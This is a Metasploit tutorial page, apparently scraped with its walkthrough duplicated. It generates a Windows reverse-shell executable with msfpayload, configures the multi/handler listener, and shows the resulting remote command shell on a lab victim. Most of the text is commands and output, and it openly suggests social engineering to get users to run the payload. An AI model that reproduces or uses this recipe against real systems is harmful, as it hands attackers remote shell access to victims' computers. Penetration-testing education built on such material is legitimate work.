Binary Payloads

It seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an executable from a Metasploit payload. This can be very useful in situations such as social engineering, if you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software.

Let's look at a quick example of how to do this. We will generate a reverse shell payload, execute it on a remote system, and get our shell. To do this we will use the command line tool msfpayload. This command can be used for generating payloads to be used in many locations and offers a variety of output options, from perl to C to raw. We are interested in the executable output, which is provided by the X command.

We'll generate a Windows reverse shell executable that will connect back to us on port 31337. Notice that msfpayload operates the same way as msfcli in that you can append the letter 'O' to the end of the command string to see which options are available to you.

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp O        Name: Windows Command Shell, Reverse TCP Inline     Version: 6479    Platform: Windows        Arch: x86 Needs Admin: No Total size: 287 Provided by: vlad902 vlad902@gmail.com Basic options: Name   Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh            yes       Exit technique: seh, thread, process LHOST                       yes       The local address LPORT    4444             yes       The local port Description: Connect back to attacker and spawn a command shell root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 O Name: Windows Command Shell, Reverse TCP Inline Version: 6479 Platform: Windows Arch: x86 Needs Admin: No Total size: 287 Provided by: vlad902 vlad902@gmail.com Basic options: Name     Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh              yes       Exit technique: seh, thread, process LHOST      172.16.104.130   yes       The local address LPORT      31337            yes       The local port Description: Connect back to attacker and spawn a command shell root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/shell_reverse_tcp Length: 287 Options: LHOST=172.16.104.130,LPORT=31337 root@bt:/pentest/exploits/framework3# file /tmp/1.exe /tmp/1.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

Ok, now we see we have a windows executable ready to go. Now, we will use 'multi/handler' which is a stub that handles exploits launched outside of the framework.

root@bt4:/pentest/exploits/framework3# ./msfconsole                 ##                          ###           ##    ## ## ## #### ###### #### #####   #####    ##    ####        ###### ####### ## ## ## ##         ## ## ##    ##   ## ##   ###   ## ####### ###### ## #####   #### ## ##    ##   ## ##   ##    ## ## # ##     ## ## ## ## ##      #####    ##   ## ##   ##    ## ##   ## #### ###   #####   #####     ##   ####   ####   #### ###                                       ##        =[ metasploit v3.3-rc1 [core:3.3 api:1.0] + -- --=[ 371 exploits - 234 payloads + -- --=[ 20 encoders - 7 nops        =[ 149 aux msf > use exploit/multi/handler msf exploit(handler) > show options Module options:    Name Current Setting Required Description    ---- --------------- -------- ----------- Exploit target:    Id Name                -- ----                0   Wildcard Target

When using the 'exploit/multi/handler' module, we still need to tell it which payload to expect so we configure it to have the same settings as the executable we generated.

msf exploit(handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf exploit(handler) > show options Module options:    Name Current Setting Required Description    ---- --------------- -------- ----------- Payload options (windows/shell/reverse_tcp):    Name      Current Setting Required Description    ----      --------------- -------- -----------    EXITFUNC thread           yes       Exit technique: seh, thread, process    LHOST                      yes       The local address    LPORT     4444             yes       The local port Exploit target:    Id Name    -- ----    0   Wildcard Target msf exploit(handler) > set LHOST 172.16.104.130 LHOST => 172.16.104.130 msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) >

Now that we have everything set up and ready to go, we run 'exploit' for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us our shell.

msf exploit(handler) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Sending stage (474 bytes) [*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Jim\My Documents>

Binary Payloads

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp O

       Name: Windows Command Shell, Reverse TCP Inline
    Version: 6479
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 287

Provided by:
  vlad902 vlad902@gmail.com 

Basic options:
Name            Current Setting   Required   Description                          
----           ---------------   --------   -----------                          
EXITFUNC   seh                          yes             Exit technique: seh, thread, process 
LHOST                                            yes       The local address                    
LPORT         4444                         yes             The local port                       

Description:
Connect back to attacker and spawn a command shell

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 O

Name: Windows Command Shell, Reverse TCP Inline
Version: 6479
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 287

Provided by:
vlad902 vlad902@gmail.com

Basic options:
Name           Current Setting   Required   Description                          
----           ---------------   --------   -----------                          
EXITFUNC   seh              yes             Exit technique: seh, thread, process 
LHOST          172.16.104.130     yes             The local address                    
LPORT          31337                       yes             The local port                       

Description:
Connect back to attacker and spawn a command shell

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp  LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 287
Options: LHOST=172.16.104.130,LPORT=31337

root@bt:/pentest/exploits/framework3# file /tmp/1.exe

/tmp/1.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit

Ok, now we see we have a windows executable ready to go. Now, we will use 'multi/handler' which is a stub that handles exploits launched outside of the framework.

root@bt4:/pentest/exploits/framework3# ./msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 371 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 149 aux

msf > use exploit/multi/handler
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description  
   ----  ---------------  --------  -----------  


Exploit target:

   Id  Name             
   --  ----             
   0   Wildcard Target

When using the 'exploit/multi/handler' module, we still need to tell it which payload to expect so we configure it to have the same settings as the executable we generated.

msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target  


msf exploit(handler) > set LHOST 172.16.104.130
LHOST => 172.16.104.130
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) >

Now that we have everything set up and ready to go, we run 'exploit' for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us our shell.

msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Jim\My Documents>

Username
Password
Remember me

System message

Binary Payloads

Binary Payloads